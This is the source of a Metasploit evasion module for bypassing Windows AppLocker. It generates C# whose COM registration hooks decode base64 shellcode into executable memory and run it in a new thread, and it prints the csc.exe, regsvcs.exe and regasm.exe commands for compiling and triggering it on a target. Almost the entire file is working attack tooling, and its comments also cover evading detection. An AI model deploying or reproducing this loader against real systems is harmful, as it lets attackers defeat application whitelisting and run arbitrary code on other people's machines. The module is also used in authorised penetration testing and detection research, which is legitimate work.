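##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Evasion
  # Number of randomised C# identifiers the generated source needs (indices 0..14).
  IDENTIFIER_COUNT = 15

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Applocker Evasion - Microsoft .NET Assembly Registration Utility',
        'Description' => %q{
          This module will assist you in evading Microsoft
          Windows Applocker and Software Restriction Policies.
          This technique utilises the Microsoft signed binaries
          RegAsm.exe or RegSvcs.exe to execute user supplied code.
        },
        'Author' => [
          'Nick Tyrer <@NickTyrer>', # module development
          'Casey Smith' # regasm_regsvcs bypass research
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Targets' => [['Microsoft Windows', {}]],
        # NOTE(review): ATT&CK has since retired T1121 in favour of the
        # sub-technique T1218.009 (Regsvcs/Regasm); the old URL still resolves,
        # but defenders map this behaviour to the newer ID.
        'References' => [['URL', 'https://attack.mitre.org/techniques/T1121/']],
        # The module only writes two files; the payload itself runs when the
        # operator compiles and registers the assembly on the target.
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptString.new('TXT_FILE', [true, 'Filename for the evasive file (default: regasm_regsvcs.txt)', 'regasm_regsvcs.txt']),
        OptString.new('SNK_FILE', [true, 'Filename for the .snk file (default: key.snk)', 'key.snk'])
      ]
    )

    # Two output files are produced, so the generic Evasion FILENAME option is
    # replaced by TXT_FILE / SNK_FILE above.
    deregister_options('FILENAME')
  end

  # The encoded payload as base64 text, embedded verbatim in the C# source.
  def build_payload
    Rex::Text.encode_base64(payload.encoded)
  end

  # One random 8-character alphabetic token, usable as a C# identifier.
  def obfu
    Rex::Text.rand_text_alpha 8
  end

  # +count+ distinct identifiers. A duplicate would make two C# declarations
  # collide and the operator's csc.exe run fail, so regenerate on collision
  # (vanishingly rare with 52^8 candidates, but the retry costs nothing).
  def obfu_names(count)
    loop do
      names = Array.new(count) { obfu }
      return names if names.uniq.size == count
    end
  end

  # C# source for a ServicedComponent whose COM register *and* unregister hooks
  # both run the payload, so either `regsvcs.exe file.dll` or `regasm.exe /U
  # file.dll` triggers it. The runtime constants are the documented Win32 values:
  # 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE, 0xFFFFFFFF = INFINITE.
  #
  # Caveat for operators: an RWX private allocation filled from a base64 string
  # and started with CreateThread is one of the most commonly hunted in-memory
  # patterns, and the base64 payload sits in clear text in the .txt/.dll. This
  # module only randomises identifiers; it does not change that footprint.
  def regasm_regsvcs
    esc = build_payload
    mod = obfu_names(IDENTIFIER_COUNT)
    <<~HEREDOC
      using System;
      using System.EnterpriseServices;
      using System.Runtime.InteropServices;
      namespace #{mod[0]}
      {
        public class #{mod[1]} : ServicedComponent
        {
          [ComRegisterFunction]
          public static void RegisterClass(string #{mod[2]})
          {
            #{mod[3]}.#{mod[14]}();
          }
          [ComUnregisterFunction]
          public static void UnRegisterClass(string #{mod[2]})
          {
            #{mod[3]}.#{mod[14]}();
          }
        }
        public class #{mod[3]}
        {
          private static Int32 #{mod[4]}=0x1000;
          private static IntPtr #{mod[5]}=(IntPtr)0x40;
          private static UInt32 #{mod[6]} = 0xFFFFFFFF;
          [System.Runtime.InteropServices.DllImport("kernel32")]
          private static extern IntPtr VirtualAlloc(IntPtr a, UIntPtr s, Int32 t, IntPtr p);
          [System.Runtime.InteropServices.DllImport("kernel32")]
          private static extern IntPtr CreateThread(IntPtr att, UIntPtr st, IntPtr sa, IntPtr p, Int32 c, ref IntPtr id);
          [System.Runtime.InteropServices.DllImport("kernel32")]
          private static extern UInt32 WaitForSingleObject(IntPtr h, UInt32 ms);
          [System.Runtime.InteropServices.DllImport("user32.dll")]
          static extern bool ShowWindow(IntPtr #{mod[7]}, int nCmdShow);
          [System.Runtime.InteropServices.DllImport("Kernel32")]
          private static extern IntPtr GetConsoleWindow();
          const int #{mod[8]} = 0;
          public static void #{mod[14]}()
          {
            IntPtr #{mod[7]};
            #{mod[7]} = GetConsoleWindow();
            ShowWindow(#{mod[7]}, #{mod[8]});
            string #{mod[9]} = "#{esc}";
            byte[] #{mod[10]} = Convert.FromBase64String(#{mod[9]});
            byte[] #{mod[11]} = #{mod[10]};
            IntPtr #{mod[12]} = VirtualAlloc(IntPtr.Zero, (UIntPtr)#{mod[11]}.Length, #{mod[4]}, #{mod[5]});
            System.Runtime.InteropServices.Marshal.Copy(#{mod[11]}, 0, #{mod[12]}, #{mod[11]}.Length);
            IntPtr #{mod[13]} = IntPtr.Zero;
            WaitForSingleObject(CreateThread(#{mod[13]}, UIntPtr.Zero, #{mod[12]}, #{mod[13]}, 0, ref #{mod[13]}), #{mod[6]});
          }
        }
      }
    HEREDOC
  end

  # Raw bytes of the strong-name key pair handed to csc.exe via /keyfile.
  #
  # The blob is a fixed constant in the module, so every assembly built with it
  # is signed by the same key and carries the same public key token -- a stable
  # indicator defenders can match on across engagements. A key pair generated
  # per engagement (e.g. `sn.exe -k key.snk`) and supplied in its place avoids
  # that. (The base64 key material is elided in this copy of the source.)
  def snk
    debaser = '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'
    Rex::Text.decode_base64(debaser)
  end

  # Msf::Evasion hook: with an argument, sets the name the next file_create will
  # use; without one, returns the name currently in effect.
  def file_format_filename(name = '')
    name.empty? ? @fname : @fname = name
  end

  # Normalise an operator-supplied filename: fall back to +default+ when blank and
  # guarantee it ends in +ext+ (compared case-insensitively). Builds a new string
  # instead of appending with << so the datastore's own value is never mutated
  # (and never raises if it is frozen).
  def normalized_name(value, default, ext)
    name = value.to_s
    name = default if name.empty?
    name.downcase.end_with?(ext) ? name : "#{name}#{ext}"
  end

  # Name of the C# source file written for the operator.
  def txt_name
    normalized_name(datastore['TXT_FILE'], 'regasm_regsvcs.txt', '.txt')
  end

  # Name of the strong-name key file written for the operator.
  def snk_name
    normalized_name(datastore['SNK_FILE'], 'key.snk', '.snk')
  end

  # Name of the DLL csc.exe produces. Only the trailing extension is swapped; a
  # bare gsub('.txt', '.dll') would also rewrite a '.txt' in the middle of a name.
  def dll_name
    txt_name.sub(/\.txt\z/i, '.dll')
  end

  # Write the C# source and the .snk key, each under its normalised filename.
  def create_files
    txt_file = regasm_regsvcs
    snk_file = snk
    file_format_filename(txt_name)
    file_create(txt_file)
    file_format_filename(snk_name)
    file_create(snk_file)
  end

  # Print the on-target compile/execute steps. Uses the same normalised names that
  # create_files actually wrote, so the instructions cannot drift from the files.
  # The 32-bit payload needs the Framework (not Framework64) toolchain.
  def instructions
    framework_dir = payload.arch.first == ARCH_X86 ? 'Framework' : 'Framework64'
    net_dir = "C:\\Windows\\Microsoft.NET\\#{framework_dir}\\[.NET Version]"
    print_status "Copy #{txt_name} and #{snk_name} to the target"
    print_status "Compile using: #{net_dir}\\csc.exe /r:System.EnterpriseServices.dll /target:library /out:#{dll_name} /keyfile:#{snk_name} #{txt_name}"
    print_status "Execute using: #{net_dir}\\regsvcs.exe #{dll_name}"
    print_status 'or'
    print_status "Execute using: #{net_dir}\\regasm.exe /U #{dll_name}"
  end

  def run
    create_files
    instructions
  end
end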